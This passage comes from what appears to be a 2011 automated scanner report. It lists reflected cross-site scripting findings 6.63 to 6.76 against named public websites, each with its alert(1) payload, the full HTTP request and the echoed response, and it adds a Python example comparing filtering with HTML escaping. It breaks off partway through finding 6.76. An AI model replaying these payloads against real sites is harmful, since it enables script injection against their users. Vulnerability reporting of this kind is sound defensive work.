Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=YKMIMIS192.168.100.193CKOUL; path=/
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=6026FD7475A30F5E2D46AA2A9B240C8C; Path=/
Set-Cookie: BrowserSession=37367945; Path=/
Set-Cookie: CustomerAccountCookie=2885689; Expires=Thu, 03-May-2012 06:54:51 GMT; Path=/
Set-Cookie: ABTesting=l-B_v-A_e-A_c-B_w-B_g-D_f-B_; Expires=Thu, 03-May-2012 06:54:51 GMT; Path=/
Set-Cookie: CustomerAccountCookie=2885689; Expires=Thu, 03-May-2012 06:54:51 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Wed, 04 May 2011 01:06:05 GMT
Content-Length: 32461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<!-- request.requestURI = /5c18a--><script>alert(1)</script>c2d42aa4496 -->
...[SNIP]...

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homegauge.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39af8<script>alert(1)</script>b8f2b39e7b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico39af8<script>alert(1)</script>b8f2b39e7b9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homegauge.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
Set-Cookie: JSESSIONID=abcj3luCHIVFrhXCUc5_s; path=/
Content-Type: text/html
Date: Wed, 04 May 2011 03:26:30 GMT
Content-Length: 13600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equ
...[SNIP]...
<code>/favicon.ico39af8<script>alert(1)</script>b8f2b39e7b9</code>
...[SNIP]...

6.64. http://www.jif.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jif.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6a6'-alert(1)-'9e021e1a105 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico2d6a6'-alert(1)-'9e021e1a105 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jif.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2718298;type=jifll509;cat=jifal114;u1=/Shared/FileNotFound?aspxerrorpath=%2ffavicon.ico2d6a6'-alert(1)-'9e021e1a105;ord=' + a + '?" width="1" height="1" frameborder="0">
...[SNIP]...

6.65. http://www.kennedyspacecenter.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kennedyspacecenter.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3aa"><script>alert(1)</script>14024c92ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4e3aa"><script>alert(1)</script>14024c92ce8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kennedyspacecenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 04 May 2011 03:10:12 GMT
Server: Microsoft-IIS/6.0
cache-control: must-revalidate
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=543dd345evw4sf45hto4g355; path=/; HttpOnly
Set-Cookie: KSCPrefs=FontSize=1; expires=Sat, 04-Jun-2011 03:10:12 GMT; path=/
Set-Cookie: KSCPrefs=FontSize=1; expires=Sat, 04-Jun-2011 03:10:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30241
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="pagehead"><!-- PageID
...[SNIP]...
<a href="mailto:?body=http://www.kennedyspacecenter.com/index.aspx&#63;404;http://www.kennedyspacecenter.com:80/favicon.ico?4e3aa"><script>alert(1)</script>14024c92ce8=1" target="_blank">
...[SNIP]...

6.66. http://www.mpsaz.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mpsaz.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bab27"><script>alert(1)</script>f3b4d1e6651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobab27"><script>alert(1)</script>f3b4d1e6651 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mpsaz.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3-7+squeeze1
Set-Cookie: mps_architeck=5bv0bt0aro7r3im92s17hhifl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Version: Architeck 2.1 "Your Friend in Time" (15)
X-Server: webvm6
X-Server-Time: 1304470365
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 00:52:45 GMT
Server: lighttpd/1.4.28
Content-Length: 5268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Rendered by webvm6 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lan
...[SNIP]...
<a href="http://translate.google.com/translate?ie=UTF-8&u=http://www.mpsaz.org/favicon.icobab27"><script>alert(1)</script>f3b4d1e6651&sl=en&tl=es">
...[SNIP]...

6.67. http://www.musi-c-lips.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.musi-c-lips.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e6e79<script>alert(1)</script>354f1011bfc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe6e79<script>alert(1)</script>354f1011bfc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musi-c-lips.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:18:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e5d98c0a7a3047b8c21996ed7cacc057; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 320

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icoe6e79<script>alert(1)</script>354f1011bfc was not found on this server.<P>
...[SNIP]...

6.68. http://www.musi-c-lips.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.musi-c-lips.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70935<script>alert(1)</script>b399bb60d6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?70935<script>alert(1)</script>b399bb60d6c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musi-c-lips.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:18:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=b81ad29635fb7fc6f29de2f7b9e3a892; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 323

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico?70935<script>alert(1)</script>b399bb60d6c=1 was not found on this server.<P>
...[SNIP]...

6.69. http://www.okdhs.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okdhs.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d027'style%3d'x%3aexpression(alert(1))'4db0e9b0b84 was submitted in the REST URL parameter 1. This input was echoed as 9d027'style='x:expression(alert(1))'4db0e9b0b84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers. The payload contains no angle brackets, so a filter that only removes < and > would not stop it, and finding 6.70 below reaches the same single-quoted href attribute with a '> break-out followed by a script tag, so the sink itself is not browser-specific.

Request

GET /favicon.ico9d027'style%3d'x%3aexpression(alert(1))'4db0e9b0b84 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okdhs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=y331acr2ln15xfzzd3p21a55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OKDHS 404
...[SNIP]...
<A title='Notify OKDHS Web Content Unit About a Broken Hyperlink' href='mailto:Webcontent@okdhs.org?Subject=ERROR: Page (location=www.okdhs.org:80/favicon.ico9d027'style='x:expression(alert(1))'4db0e9b0b84) not found'>
...[SNIP]...

6.70. http://www.okdhs.org/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okdhs.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9942'><script>alert(1)</script>8b6b78817e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c9942'><script>alert(1)</script>8b6b78817e8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okdhs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bopmnhbmcwkofxnbgy0sokaa; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OKDHS 404
...[SNIP]...
<A title='Notify OKDHS Web Content Unit About a Broken Hyperlink' href='mailto:Webcontent@okdhs.org?Subject=ERROR: Page (location=www.okdhs.org:80/favicon.ico?c9942'><script>alert(1)</script>8b6b78817e8=1) not found'>
...[SNIP]...

6.71. http://www.okdhs.org/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okdhs.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d065<script>alert(1)</script>153e79ba33e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?2d065<script>alert(1)</script>153e79ba33e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okdhs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bhjjes45nu0yg155yjaif1nv; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OKDHS 404
...[SNIP]...
<b>www.okdhs.org:80/favicon.ico?2d065<script>alert(1)</script>153e79ba33e=1</b>
...[SNIP]...
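Findings 6.68 to 6.71 reflect the same kind of input into three different HTML contexts: plain text between tags (6.68, 6.71), a single-quoted attribute value (6.69, 6.70) and, from 6.72 onward, a double-quoted attribute value. The context decides which characters the attacker needs and therefore which characters a fix has to neutralise. The Python below is an added example, not part of the original report or of the scanner that produced it. It renders the three sinks copied from the responses on this page with the report's own payloads, labels the context the way the Issue detail wording does, and checks whether the result still executes: unfiltered, after a filter that only strips angle brackets, and after full HTML entity encoding (html.escape with quote=True). The tokenizer is deliberately simplified to the tag and quote states these sinks need, and the benign value "/favicon.ico" used as a baseline is a constructed input. Two points the scanner text does not spell out come out of the checks: the 6.69 payload survives an angle-bracket strip untouched, and even for the double-quoted sink such a strip still lets the attacker add attributes (and so event handlers) to the tag.

```python
import html

# Sinks copied from the responses on this page; "{}" marks where the server
# inserted the request path or parameter name without encoding it.
SINK_TEXT = "The requested URL {} was not found on this server.<P>"          # 6.68
SINK_ATTR_SINGLE = ("<A title='Notify OKDHS Web Content Unit About a Broken Hyperlink' "
                    "href='mailto:Webcontent@okdhs.org?Subject=ERROR: Page "
                    "(location=www.okdhs.org:80{}) not found'>")              # 6.69
SINK_ATTR_DOUBLE = '<input type="hidden" name="atag" value="{}" />'          # 6.72

# Reflected values as they appear in the responses (6.69 was sent with %3d and
# %3a in the request line; the server decoded them before echoing).
PAYLOAD_6_68 = "/favicon.ico?70935<script>alert(1)</script>b399bb60d6c=1"
PAYLOAD_6_69 = "/favicon.ico9d027'style='x:expression(alert(1))'4db0e9b0b84"
PAYLOAD_6_72 = '/contact527ee"><script>alert(1)</script>50d3281d89a'


def context_at(body, index):
    """Parse context at body[index]: 'text', 'tag', 'attr_single' or 'attr_double'.
    Simplified HTML tokenizer: inside a tag a quote opens a value only after '='."""
    in_tag, quote, after_eq = False, None, False
    for ch in body[:index]:
        if not in_tag:
            in_tag = ch == "<"
        elif quote:
            if ch == quote:
                quote = None
        elif ch in "'\"" and after_eq:
            quote, after_eq = ch, False
        elif ch == "=":
            after_eq = True
        elif ch == ">":
            in_tag, after_eq = False, False
        elif ch not in " \t\r\n":
            after_eq = False
    if not in_tag:
        return "text"
    return {"'": "attr_single", '"': "attr_double", None: "tag"}[quote]

def reflection_context(body, needle):
    """Context of the first occurrence of needle: the scanner's 'copied into ...' label."""
    i = body.find(needle)
    return None if i == -1 else context_at(body, i)

def first_tag_attrs(body):
    """Attribute names of the first tag, tokenised as a browser does it: the matching
    quote ends a value, so a stray quote inside the data starts new attributes."""
    i, n, names = body.find("<") + 1, len(body), []
    if i == 0:
        return names
    while i < n and body[i] not in " \t\r\n/>":        # skip the tag name
        i += 1
    while i < n:
        while i < n and body[i] in " \t\r\n/":
            i += 1
        if i >= n or body[i] == ">":
            break
        j = i
        while j < n and body[j] not in " \t\r\n/=>":   # attribute name
            j += 1
        names.append(body[i:j].lower())
        i = j
        while i < n and body[i] in " \t\r\n":
            i += 1
        if i < n and body[i] == "=":                    # attribute value
            i += 1
            while i < n and body[i] in " \t\r\n":
                i += 1
            if i < n and body[i] in "'\"":
                end = body.find(body[i], i + 1)
                i = n if end == -1 else end + 1
            else:
                while i < n and body[i] not in " \t\r\n>":
                    i += 1
    return names

def script_tag_in_text(body):
    """True if a <script> start tag sits in text context, i.e. the browser runs it."""
    low = body.lower()
    i = low.find("<script")
    while i != -1:
        if context_at(body, i) == "text":
            return True
        i = low.find("<script", i + 1)
    return False

def strip_angle_brackets(value):
    """A common but inadequate filter: removes < and > only."""
    return value.replace("<", "").replace(">", "")

def escape_html(value):
    """The fix that covers all three sinks: encode ampersand, < >, double and single quotes."""
    return html.escape(value, quote=True)

def assess(sink, reflected, sanitizer=lambda v: v, benign="/favicon.ico"):
    """Render the sink with the (sanitised) value and report whether the result runs
    script: a <script> tag in text context, or attributes the sink does not have when
    rendered with the benign baseline value."""
    rendered = sink.replace("{}", sanitizer(reflected))
    baseline = set(first_tag_attrs(sink.replace("{}", benign)))
    injected = sorted(set(first_tag_attrs(rendered)) - baseline)
    in_text = script_tag_in_text(rendered)
    return {"script_in_text": in_text, "injected_attrs": injected,
            "exploitable": in_text or bool(injected)}
```

assess(SINK_ATTR_SINGLE, PAYLOAD_6_69, strip_angle_brackets) still lists style among the injected attributes, while escape_html leaves every sink with its original attributes and no script tag in text context; that is the difference between a filter aimed at one payload and output encoding aimed at the context.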

6.72. http://www.quantumjumping.com/contact [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 527ee"><script>alert(1)</script>50d3281d89a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact527ee"><script>alert(1)</script>50d3281d89a HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/contact527ee"><script>alert(1)</script>50d3281d89a" />
...[SNIP]...

6.73. http://www.quantumjumping.com/contact/view [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 520b9"><script>alert(1)</script>ce7efd0b833 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact520b9"><script>alert(1)</script>ce7efd0b833/view?tag=account&limit=5&title=Members+Area+and+Passwords HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/contact520b9"><script>alert(1)</script>ce7efd0b833/view?tag=account&limit=5&title=members+area+and+passwords" />
...[SNIP]...

6.74. http://www.quantumjumping.com/contact/view [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d05f"><script>alert(1)</script>2287f8c60c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/view9d05f"><script>alert(1)</script>2287f8c60c2?tag=account&limit=5&title=Members+Area+and+Passwords HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:58:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/contact/view9d05f"><script>alert(1)</script>2287f8c60c2?tag=account&limit=5&title=members+area+and+passwords" />
...[SNIP]...

6.75. http://www.quantumjumping.com/contact/view [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload e61d8<script>alert(1)</script>34c5233e77f was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/view?tag=account&limit=5&title=Members+Area+and+Passwordse61d8<script>alert(1)</script>34c5233e77f HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:55:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 8157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<h1 style="text-align:center;">Members Area and Passwordse61d8<script>alert(1)</script>34c5233e77f</h1>
...[SNIP]...

6.76. http://www.quantumjumping.com/customers/support/article [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

